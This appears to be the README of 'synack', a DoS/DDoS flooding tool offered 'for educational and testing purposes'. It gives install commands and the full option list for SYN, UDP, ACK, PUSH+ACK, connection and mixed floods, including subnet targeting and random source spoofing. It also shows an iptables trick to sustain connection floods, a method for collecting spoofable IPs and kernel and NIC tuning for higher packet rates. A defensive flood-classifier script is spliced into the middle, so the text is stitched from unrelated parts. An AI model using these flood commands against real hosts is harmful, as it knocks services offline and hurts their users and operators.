Tool created for testing DDoS/DoS attacks. Supports SYN, UDP, TCP connection, ACK, PUSH+ACK and mixed floods. Created FOR EDUCATIONAL AND TESTING purposes only.
edubart - github.com/edubart
$ git clone git://github.com/edubart/synack.git
$ cd synack
$ make
$ sudo make install
TCP Ping
Ping a TCP port by sending a simple SYN packet. This option was created
just to check the target's responsiveness.
Connection flood
Flood TCP services with the 3-way TCP handshake, causing
a massive number of connections on the host, exhausting its resources
and then preventing new connections.
NOTE: If you use this attack, you MUST add the following iptables
rule to prevent your kernel from aborting the attack; otherwise your
kernel will reject all established connections on the target:
iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP
NOTE: Spoofing can't be used with this attack.
NOTE: If you are behind a shared connection with a router as gateway,
make sure that the router can handle a massive number of connections;
home routers usually can't, so you might want to connect directly
if possible. By directly I mean assigning your public IP directly to
your interface.
SYN, UDP floods
Well-known flood types
ACK, PA, Mixed S/A/PA/FA and Mixed A/PA/FA floods
Uncommon flood types created for testing purposes
NOTE:
PA = TCP with flags PUSH+ACK set
FA = TCP with flags FIN+ACK set
S = TCP with flag SYN set
A = TCP with flag ACK set
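For the defending side, the flag abbreviations above map directly onto the flag strings tcpdump prints, so a capture can be summarized per destination by flag class and by how many distinct sources sent it. This is an added example, not part of synack; the sample lines, the min_packets cutoff and the function names are constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# tcpdump flag strings mapped to the abbreviations used in this README.
FLAG_NAMES = {"S": "S", ".": "A", "P.": "PA", "F.": "FA", "S.": "SA"}
LINE_RE = re.compile(
    r"IP (\d+(?:\.\d+){3})\.\d+ > (\d+(?:\.\d+){3})\.(\d+): Flags \[([^\]]+)\]")

# Constructed `tcpdump -n -t` lines (documentation address ranges only).
SAMPLE = [f"IP 198.51.100.{i}.4000{i} > 192.0.2.10.9999: Flags [.], ack 1, win 512, length 0"
          for i in range(1, 7)]
SAMPLE += [f"IP 203.0.113.5.51000 > 192.0.2.10.80: Flags [{f}], win 512, length 0"
           for f in ("S", ".", "P.", ".", "F.")]
SAMPLE.append("IP 203.0.113.9.5353 > 192.0.2.10.53: UDP, length 40")

def summarize(lines):
    """Per (dst_ip, dst_port): packets per flag class and the set of source IPs."""
    stats = defaultdict(lambda: {"flags": Counter(), "sources": set()})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a TCP line (for example UDP) or not parsable
        src, dst, dport, flags = m.groups()
        entry = stats[(dst, int(dport))]
        entry["flags"][FLAG_NAMES.get(flags, "other")] += 1
        entry["sources"].add(src)
    return stats

def profile(entry, min_packets=5):
    """Return (label, packets, distinct_sources); min_packets is an assumed cutoff."""
    seen = set(entry["flags"])
    total = sum(entry["flags"].values())
    if total < min_packets:
        label = "too few packets"
    elif "other" in seen:
        label = "other"
    elif len(seen) == 1:
        label = f"{seen.pop()} only"
    elif seen <= {"A", "PA", "FA"}:
        label = "mixed A/PA/FA"
    elif seen <= {"S", "A", "PA", "FA"}:
        label = "mixed S/A/PA/FA"
    else:
        label = "other"
    return label, total, len(entry["sources"])

if __name__ == "__main__":
    for (dst, port), entry in sorted(summarize(SAMPLE).items()):
        # Many packets from one source is what a normal connection looks like;
        # roughly one packet per source suggests stateless or spoofed traffic.
        print(dst, port, *profile(entry))
```

The flag profile alone is not a verdict, since legitimate connections carry the same flags; read it together with the packet count and the number of distinct sources.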
synack -i <interface> -h <host> [action] [options]
Actions:
-P - TCP ping (default action)
-C - Connection flood
-S - SYN flood
-A - ACK flood
-X - SYN+ACK flood
-D - PA flood
-M - Mixed S/A/PA/FA flood
-N - Mixed A/PA/FA flood
-U - UDP flood
-O - Monitor interface traffic
General options:
-i [interface] - Which interface to do the action (required)
-h [host,host2] - Target hosts separated by comma, accepts 'host:port' syntax too (required)
-H [targets file] - Targets in a file where each line is in ip:port format
-n [subnet] - Attack subnet, use formats like 192.168.0.0/16
-p [port] - Target port (default: random)
-t [time] - Run time in seconds (default: infinite)
-u [interval] - Sleep interval in microseconds (default: 10000)
-j [pps] - Calculates a sleep interval for desired packets per second output (accurate with multiple threads)
-b [bytes] - Additional random bytes to send as data (default: 0)
-m [threads] - Number of send threads (default: 1)
-s [ip] - Custom source ip, you may set to 'random' (default: interface ip)
-d [binary file] - Send binary file as data
-z [page] [host] - Send simple HTTP 1.1 request as data
-f [text file] - Read a list of IPs from a text file for spoofing
-o - Disable tcp options on SYN packets
-q - Quiet, don't print statistics output
-x - Drop established connections when receive ACK packets
-y [delay] - Drop established connections after delay
-k [smac] [dmac] - Use rawsendto kernel patch to send massive kpps
-c [count] - Max number of packets to send
-w - Stop after one packet was sent to all targets
--help - Print this help
How to generate a spoof IP list
# on target machine
iptables -I INPUT -p tcp --dport 9999 -j DROP
tcpdump -i eth0 tcp port 9999 -n -t -c 1100000 > spoofsniff
cat spoofsniff | awk '{print $2}' | sed 's/^\(.*\)\..*$/\1/' | sort | uniq > spoofips
# on source machine
synack -i eth0 -s random -h target -A -p 9999 -m 10 -j 1000
How to speed up throughput to get more pps (packets per second)
# enable XPS
echo f > /sys/class/net/eth1/queues/tx-0/xps_cpus
# increase txqueuelen
ifconfig eth1 txqueuelen 100000
# increase interface tx ring buffer
ethtool -G eth1 tx 4096
# enable 1000mbps full duplex
ethtool -s eth1 speed 1000 duplex full
# patch kernel with rawsendto to enable option -k for even more throughput
# in the menuconfig make sure you do the following:
# * disable optimize for size
# * select your CPU architecture
# * disable preemption
# * change timer clock to 100Hz
sudo apt-get install build-essential kernel-package
wget http://www.kernel.org/pub/linux/kernel/v3.0/linux-3.2.7.tar.bz2
tar xjf linux-3.2.7.tar.bz2
cd linux-3.2.7
cp /boot/config-2.6.32-5-amd64 .config
patch -p1 < rawsendto.patch
make menuconfig
fakeroot make-kpkg clean
fakeroot make-kpkg --append-to-version="-rawsendto" --initrd --us --uc -j4 kernel_image kernel_headers
cd ..
sudo dpkg -i linux-image-3.2.7-rawsendto_3.2.7-rawsendto-10.00.Custom_amd64.deb
sudo reboot